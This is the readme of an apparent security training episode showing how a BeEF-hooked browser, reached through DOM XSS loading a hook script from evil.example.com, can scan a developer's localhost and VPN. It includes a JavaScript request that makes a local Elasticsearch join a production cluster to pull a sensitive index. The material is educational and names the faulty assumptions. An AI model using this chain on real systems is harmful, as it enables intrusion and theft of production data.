Skip to content

ep8-exploiting-dev-envs-part-2

Directory actions

More options

Directory actions

More options

Latest commit

 

History

History

ep8-exploiting-dev-envs-part-2

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
readme.org
readme.org
 
 

readme.org

Exploiting Local Dev Environments

Exploiting Local Dev Envs

Table Of Contents

Running Locally

BeEF

  • Browser Exploitation Framework (BeEF)
  • Creates a browser botnet that can be controlled by a central server
  • “BeEF looks past the hardened network perimeter and examines exploitability within the context of the one open door: the web browser”
    • What security assumption does this exploit?
      • Our VPN protects our network from the public internet

How does BeEF work?

  1. Bob visits a page with malicious Javascript
    • Ex: Mallory’s DOM XSS loaded evil.example.com:3000/hook.js
  2. hook.js interacts with Mallory’s Command and Control (C&C) server
  3. Through the C&C server, Mallory launches attacks from the victim’s browser
    • BeEF allows Mallory to…
      1. Find servers on the victim’s local area network (LAN)
        • Including servers listening on localhost
      2. Make REST requests to these servers if CORS isn’t strict
      3. Execute arbitrary Javascript payloads within the victim’s browser

Demo: How To Find A Dev’s ES Instance

  • Leverage BeEF Cross-Origin Scanner Module
  • Check for an Elasticsearch (ES) instance running locally with a permissive CORS policy
  • If ES has a permissive CORS policy, BeEF can
    • Send any type of REST request to the DEV ES instance
      • ES 5.6 Community Edition currently has no authentication built in
        • Includes clustering interface

Demo: Finding A Prod ES Instance

  • Scenario
    • Dev is on VPN
    • VPN contains a Prod ES instance
    • Prod ES instance doesn’t allow CORS
      • Its “locked down” so BeEf attacks won’t work
      • “Its safe because its on the VPN”
  • BeEF Port Scanner Module
    • Uses methods to avoid blocked ports or Same Origin Policy
      • If a server doesn’t allow CORS, it can still see if it exists
      • Uses WebSockets, <img src=""> tags, etc.

Demo: Finding A Prod ES Instance (CONT.)

  • Future: Script to scan subnet for hosts
    • Port Scanner module currently scans 1 host at a time
  • For simplicity we’ll scan prod.example.com:9201
    • Leverage DNS just for easier separation

Exfiltrating Data

  • Due to PROD ES CORS Policy, BeEF can’t directly connect…
  • How could Mallory exfiltrate data while covering her tracks?
    • Have DEV ES join PROD ES as a cluster member?
    • Leverage Cross Cluster Search to query Prod ES without joining as a cluster member
      • No syncing of complete dataset

Demo: Cross Cluster Search

var xhr = new XMLHttpRequest();
xhr.open('PUT',"http://localhost:9200/_cluster/settings", true);
xhr.setRequestHeader("Content-type", "application/json");
xhr.send (JSON.stringify({
  "persistent": {
    "search": {
      "remote": {
        "cluster_one": {
          "seeds": [
            "prod.example.com:9300"
          ]
        }
      }
    }
  }
}));

Demo: Searching The PROD Cluster

  • Pre-seeded with sensitive-data index with passwords
  • Leverage CORS Request Module
    • Will initiate this request on the victim’s computer
      • http://localhost:9200/*:sensitive-data/_search?pretty

Assumption Recap

  • How did this all happen?
  • DOM XSS allowed Mallory to control the victim’s browser
    • “Client-side XSS validation is a bad practice”
  • Permissive CORS policy within DEV environment
    • Allowed Mallory to establish a connection with a PROD ES instance
    • “The outside internet cant interact with a process listening on localhost
  • Leveraging CE software with no authentication
    • Allowed Mallory to exfiltrate data out of production ES instance
    • “Our authentication is our VPN”

Mitigations

Knowledge Dependency Tree